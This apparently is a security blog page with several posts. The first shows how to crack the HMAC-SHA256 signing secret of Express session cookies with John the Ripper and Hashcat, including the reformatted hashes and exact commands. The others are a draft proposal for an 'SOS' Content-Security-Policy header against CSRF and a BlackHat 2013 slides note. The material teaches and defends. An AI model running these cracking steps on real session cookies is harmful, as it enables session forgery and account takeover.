Set-Cookie: connect.sess=s%3AGY4Xp1AWB5PVzYHCANaXHznO.PUvao3Y6%2FXxLAG%2Bp4xQEBAcbqMCJPACQUvS2WCfsmKU; Path=/; Expires=Fri, 28 Jun 2013 23:13:52 GMT; HttpOnly
Set-Cookie: connect.sid=s%3ATdF%2FriiKHfdilCTc4W5uAAhy.qTtH9ZL5pxgClGbZ0I0E3efJTrdC0jia6YxFh3cWKrU; path=/; expires=Fri, 28 Jun 2013 22:51:58 GMT; httpOnly
Set-Cookie: connect.sid=CJVZnS56R6NY8kenBhhIOq0h.0opeJzAPZ3efz0dw5YJrGqVv4Fi%2BWVIThEsGHMRqDw0; Path=/; HttpOnly

Everyone’s Secret

John the Ripper is a venerable password guessing tool with ancient roots in the security community. Its rule-based guessing techniques and speed make it a powerful tool for cracking passwords. In this case, we’re just interested in its ability to target the HMAC-SHA256 algorithm.

First, we need to reformat the cookies into a string that John recognizes. For these cookies, resolve the percent-encoded characters, replace the dot (.) with a hash (#). (Some of the cookies contained a JSON-encoded version of the session value, others contained only the session value.)

GY4Xp1AWB5PVzYHCANaXHznO#3d4bdaa3763afd7c4b006fa9e3140404071ba8c0893c009052f4b65827ec98a5
TdF/riiKHfdilCTc4W5uAAhy#a93b47f592f9a718029466d9d08d04dde7c94eb742d2389ae98c458777162ab5
CJVZnS56R6NY8kenBhhIOq0h#d28a5e27300f67779fcf4770e5826b1aa56fe058be595213844b061cc46a0f0d

Next, we unleash John against it. The first step might use a dictionary, such as a words.txt file you might have laying around. (The book covers more techniques and clever use of rules to target password patterns. John’s own documentation can also get you started.)
$ ./john --format=hmac-sha256 --wordlist=words.txt sids.john

Review your successes with the --show option.
$ ./john --show sids.john

Hashcat is another password guessing tool. It takes advantage of GPU processors to emphasize rate of guesses. It requires a slightly different format for the HMAC-256 input file. The order of the password and salt is reversed from John, and it requires a colon separator.

3d4bdaa3763afd7c4b006fa9e3140404071ba8c0893c009052f4b65827ec98a5:GY4Xp1AWB5PVzYHCANaXHznO
a93b47f592f9a718029466d9d08d04dde7c94eb742d2389ae98c458777162ab5:TdF/riiKHfdilCTc4W5uAAhy
d28a5e27300f67779fcf4770e5826b1aa56fe058be595213844b061cc46a0f0d:CJVZnS56R6NY8kenBhhIOq0h

Hashcat uses numeric references to the algorithms it supports. The following command runs a dictionary attack against hash algorithm 1450, which is HMAC-SHA256.
$ ./hashcat-cli64.app -a 0 -m 1450 sids.hashcat words.txt

Review your successes with the --show option.
$ ./hashcat-cli64.app --show -a 0 -m 1450 sids.hashcat words.txt

Hold on! There’s movement in the brush. Let me check what beastie lurks there. I’ll be right back…

…And They Have a Plan

No notes are so disjointed as the ones skulking about my brain as I was preparing slides for last week’s BlackHat presentation. I’ve now wrangled them into a mostly coherent write-up.

This won’t be the last post on this topic. I’ll be doing two things over the next few weeks: throwing a doc into github to track changes/recommendations/etc., responding to more questions, working on a different presentation, and trying to stick to the original plan (i.e. two things). Oh, and getting better at MarkDown.

So, turn up some Jimi Hendrix, play some BSG in the background, and read on.

== The Problem ==

Cross-Site Request Forgery (CSRF) abuses the normal ability of browsers to make cross-origin requests by crafting a resource on one origin that causes a victim’s browser to make a request to another origin using the victim’s security context associated with that target origin.

The attacker creates and places a malicious resource on an origin unrelated to the target origin to which the victim’s browser will make a request. The malicious resource contains content that causes a browser to make a request to the unrelated target origin. That request contains parameters selected by the attacker to affect the victim’s security context with regard to the target origin.

The attacker does not need to violate the browser’s Same Origin Policy to generate the cross origin request. Nor does the attack require reading the response from the target origin. The victim’s browser automatically includes cookies associated with the target origin for which the forged request is being made. Thus, the attacker creates an action, the browser requests the action and the target web application performs the action under the context of the cookies it receives — the victim’s security context.

An effective CSRF attack means the request modifies the victim’s context with regard to the web application in a way that’s favorable to the attacker. For example, a CSRF attack may change the victim’s password for the web application.

CSRF takes advantage of web applications that fail to enforce strong authorization of actions during a user’s session. The attack relies on the normal, expected behavior of web browsers to make cross-origin requests from resources they load on unrelated origins.

The browser’s Same Origin Policy prevents a resource in one origin to read the response from an unrelated origin. However, the attack only depends on the forged request being submitted to the target web app under the victim’s security context — it does not depend on receiving or seeing the target app’s response.

== The Proposed Solution ==

SOS is proposed an additional policy type of the Content Security Policy. Its behavior also includes pre-flight behavior as used by the Cross Origin Resource Sharing spec.

SOS isn’t just intended as a catchy an acronym. The name is intended to evoke the SOS of Morse code, which is both easy to transmit and easy to understand. If it is required to explain what SOS stands for, then “Session Origin Security” would be preferred. (However, “Simple Origin Security”, “Some Other Security”, and even “Save Our Site” are acceptable. “Same Old Stuff” is discouraged. More options are left to the reader.)

An SOS policy may be applied to one or more cookies for a web application on a per-cookie or collective basis. The policy controls whether the browser includes those cookies during cross-origin requests. (A cross-origin resource cannot access a cookie from another origin, but it may generate a request that causes the cookie to be included.)

== Format ==

A web application sets a policy by including a Content-Security-Policy response header. This header may accompany the response that includes the Set-Cookie header for the cookie to be covered, or it may be set on a separate resource.

A policy for a single cookie would be set as follows, with the cookieName of the cookie and a directive of 'any', 'self', or 'isolate'. (Those directives will be defined shortly.)

Content-Security-Policy: sos-apply=cookieName 'policy'

A response may include multiple CSP headers, such as:

Content-Security-Policy: sos-apply=cookieOne 'policy'
Content-Security-Policy: sos-apply=cookieTwo 'policy'

A policy may be applied to all cookies by using a wildcard:

Content-Security-Policy: sos-apply=* 'policy'

== Policies ==

One of three directives may be assigned to a policy. The directives affect the browser’s default handling of cookies for cross-origin requests to a cookie’s destination origin. The pre-flight concept will be described in the next section; it provides a mechanism for making exceptions to a policy on a per-resource basis.

Policies are only invoked for cross-origin requests. Same origin requests are unaffected.

'any' — include the cookie. This represents how browsers currently work. Make a pre-flight request to the resource on the destination origin to check for an exception response.

'self' — do not include the cookie. Make a pre-flight request to the resource on the destination origin to check for an exception response.

'isolate' — never include the cookie. Do not make a pre-flight request to the resource because no exceptions are allowed.

== Pre-Flight ==

A browser that is going to make a cross-origin request that includes a cookie covered by a policy of 'any' or 'self' must make a pre-flight check to the destination resource before conducting the request. (A policy of 'isolate' instructs the browser to never include the cookie during a cross-origin request.)

The purpose of a pre-flight request is to allow the destination origin to modify a policy on a per-resource basis. Thus, certain resources of a web app may allow or deny cookies from cross-origin requests despite the default policy.

The pre-flight request works identically to that for Cross Origin Resource Sharing, with the addition of an Access-Control-SOS header. This header includes a space-delimited list of cookies that the browser might otherwise include for a cross-origin request, as follows:

Access-Control-SOS: cookieOne CookieTwo

A pre-flight request might look like the following, note that the Origin header is expected to be present as well:

OPTIONS https://web.site/resource HTTP/1.1
Host: web.site
Origin: http://other.origin
Access-Control-SOS: sid
Connection: keep-alive
Content-Length: 0

The destination origin may respond with an Access-Control-SOS-Reply header that instructs the browser whether to include the cookie(s). The response will either be 'allow' or 'deny'.

The response header may also include an expiration in seconds. The expiration allows the browser to remember this response and forego subsequent pre-flight checks for the duration of the value.

The following example would allow the browser to include a cookie with a cross-origin request to the destination origin even if the cookie’s policy had been 'self‘. (In the absence of a reply header, the browser would not include the cookie.)

Access-Control-SOS-Reply: 'allow' expires=600

The following example would deny the browser to include a cookie with a cross-origin request to the destination origin even if the cookie’s policy had been 'any'. (In the absence of a reply header, the browser would include the cookie.)

Access-Control-SOS-Reply: 'deny' expires=0

The browser would be expected to track policies and policy exceptions based on destination origins. It would not be expected to track pairs of origins (e.g. different cross-origins to the destination) since such a mapping could easily become cumbersome, inefficient, and more prone to abuse or mistakes.

As described in this section, the pre-flight is an all-or-nothing affair. If multiple cookies are listed in the Access-Control-SOS header, then the response applies to all of them. This might not provide enough flexibility. On the other hand, simplicity tends to encourage security.

== Benefits ==

Note that a policy can be applied on a per-cookie basis. If a policy-covered cookie is disallowed, any non-covered cookies for the destination origin may still be included. Think of a non-covered cookie as an unadorned or “naked” cookie — their behavior and that of the browser matches the web of today.

The intention of a policy is to control cookies associated with a user’s security context for the destination origin. For example, it would be a good idea to apply 'self' to a cookie used for authorization (and identification, depending on how tightly coupled those concepts are by the app’s reliance on the cookie).

Imagine a WordPress installation hosted at https://web.site/. The site’s owner wishes to allow anyone to visit, especially when linked-in from search engines, social media, and other sites of different origins. In this case, they may define a policy of 'any' set by the landing page:

Content-Security-Policy: sos-apply=sid 'any'

However, the /wp-admin/ directory represents sensitive functions that should only be accessed by intention of the user. WordPress provides a robust nonce-based anti-CSRF token. Unfortunately, many plugins forget to include these nonces and therefore become vulnerable to attack. Since the site owner has set a policy for the sid cookie (which represents the session ID), they could respond to any pre-flight request to the /wp-admin/ directory as follows:

Access-Control-SOS-Reply: 'deny' expires=86400

Thus, the /wp-admin/ directory would be protected from CSRF exploits because a browser would not include the sid cookie with a forged request.

The use case for the 'isolate' policy is straight-forward: the site does not expect any cross-origin requests to include cookies related to authentication or authorization. A bank or web-based email might desire this behavior. The intention of isolate is to avoid the requirement for a pre-flight request and to forbid exceptions to the policy.

== Notes ==

This is a draft. The following thoughts represent some areas that require more consideration or that convey some of the motivations behind this proposal.

This is intended to affect cross-origin requests made by a browser.

It is not intended to counter same-origin attacks such as HTML injection (XSS) or intermediation attacks such as sniffing. Attempting to solve multiple problems with this policy leads to folly.

CSRF evokes two sense of the word “forgery”: creation and counterfeiting. This approach doesn’t inhibit the creation of cross-origin requests (although something like “non-simple” XHR requests and CORS would). Nor does it inhibit the counterfeiting of requests, such as making it difficult for an attacker to guess values. It defeats CSRF by blocking a cookie that represents the user’s security context from being included in a cross-origin request the user likely didn’t intend to make.

There may be a reason to remove a policy from a cookie, in which case a CSP header could use something like an sos-remove instruction:

Content-Security-Policy: sos-remove=cookieName

Cryptographic constructs are avoided on purpose. Even if designed well, they are prone to implementation error. They must also be tracked and verified by the app, which exposes more chances for error and induces more overhead. Relying on nonces increases the difficulty of forging (as in counterfeiting) requests, whereas this proposed policy defines a clear binary of inclusion/exclusion for a cookie. A cookie will or will not be included vs. a nonce might or might not be predicted.

PRNG values are avoided on purpose, for the same reasons as cryptographic nonces. It’s worth noting that misunderstanding the difference between a random value and a cryptographically secure PRNG (which a CSRF token should favor) is another point against a PRNG-based control.

A CSP header was chosen in favor of decorating the cookie with new attributes because cookies are already ugly, clunky, and (somewhat) broken enough. Plus, the underlying goal is to protect a session or security context associated with a user. As such, there might be reason to extended this concept to the instantiation of Web Storage objects, e.g. forbid them in mixed-origin resources. However, this hasn’t really been thought through and probably adds more complexity without solving an actual problem.

The pre-flight request/response shouldn’t be a source of information leakage about cookies used by the app. At least, it shouldn’t provide more information than might be trivially obtained through other techniques.

It’s not clear what an ideal design pattern would be for deploying SOS headers. A policy could accompany each Set-Cookie header. Or the site could use a redirect or similar bottleneck to set policies from a single resource.

It would be much easier to retrofit these headers on a legacy app by using a Web App Firewall than it would be trying to modify code to include nonces everywhere.

It would be (possibly) easier to audit a site’s protection based on implementing the headers via mod_rewrite tricks or WAF rules that apply to whole groups of resources than it would for a code audit of each form and action.

The language here tilts (too much) towards formality, but the terms and usage haven’t been vetted yet to adhere to those in HTML, CSP and CORS. The goal right now is clarity of explanation; pedantry can wait.

== Cautions ==

In addition to the previous notes, these are highlighted as particular concerns.

Conflicting policies would cause confusion. For example, two different resources separately define an 'any' and 'self' for the same cookie. It would be necessary to determine which receives priority.

Cookies have the unfortunate property that they can belong to multiple origins (i.e. sub-domains). Hence, some apps might incur additional overhead of pre-flight requests or complexity in trying to distinguish cross-origin of unrelated domains and cross-origin of sub-domains.

Apps that rely on “Return To” URL parameters might not be fixed if the return URL has the CSRF exploit and the browser is now redirecting from the same origin. Maybe. This needs some investigation.

There’s no migration for old browsers: You’re secure (using a supporting browser and an adopted site) or you’re not. On the other hand, an old browser is an insecure browser anyway — browser exploits are more threatening than CSRF for many, many cases.

There’s something else I forgot to mention that I’m sure I’ll remember tomorrow.

=====

You’re still here? I’ll leave you with this quote from the last episode of BSG. (It’s a bit late to be apologizing for spoilers…) Thanks for reading!

Six: All of this has happened before.
Baltar: But the question remains, does all of this have to happen again?

BlackHat US 2013: Dissecting CSRF…

Here are the slides for my presentation at this year’s BlackHat US conference, Dissecting CSRF Attacks & Countermeasures. Thanks to everyone who came and to those who hung around afterwards to ask questions and discuss the content.

The major goal of this presentation was to propose a new way to leverage the concepts of Content Security Policy and Cross-Origin Resource Sharing to counter CSRF attacks. Essentially, we proposed a header that web apps could set to inform browsers when to include that app’s cookies during cross-origin requests. As always, slides alone don’t convey the nuances of the presentation. Stay tuned for a more thorough explanation of the concept.

%d bloggers like this: